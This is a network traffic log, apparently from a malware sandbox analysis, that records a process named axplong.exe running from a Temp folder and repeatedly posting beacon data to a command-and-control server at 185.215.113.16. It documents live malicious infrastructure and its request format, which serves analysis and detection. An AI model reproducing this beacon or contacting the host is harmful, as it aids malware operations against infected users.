Sep 26, 2024 15:42:51.983774900 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:52.219329119 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.6	52365	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:52.331569910 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:53.042387009 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:53.043203115 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:53.270215034 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.6	52366	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:53.378290892 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:54.093739033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:54.094599962 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:54.327029943 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.6	52367	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:54.488035917 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:55.171766996 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:55.172557116 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:55.395965099 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.6	52368	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:55.503397942 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:56.213516951 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:56.214476109 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:56.442953110 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.6	52369	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:56.552180052 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:57.260196924 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:57.349971056 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:57.578777075 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.6	52370	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:57.691884995 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:58.420772076 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:58.421725035 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:58.660734892 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.6	52371	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:58.769398928 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:42:59.486648083 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:42:59.487883091 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:42:59.717890978 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:42:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.6	52372	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:42:59.879235983 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:00.584180117 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:00.585761070 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:00.816585064 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.6	52373	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:00.928431988 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:01.627623081 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:01.628426075 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:01.860166073 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	52374	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:01.971878052 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:02.685197115 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:02.750123024 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:02.984669924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	52375	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:03.113107920 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:03.908499002 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:03.911488056 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:04.136341095 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	52376	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:04.524465084 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:05.249052048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:05.252619028 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
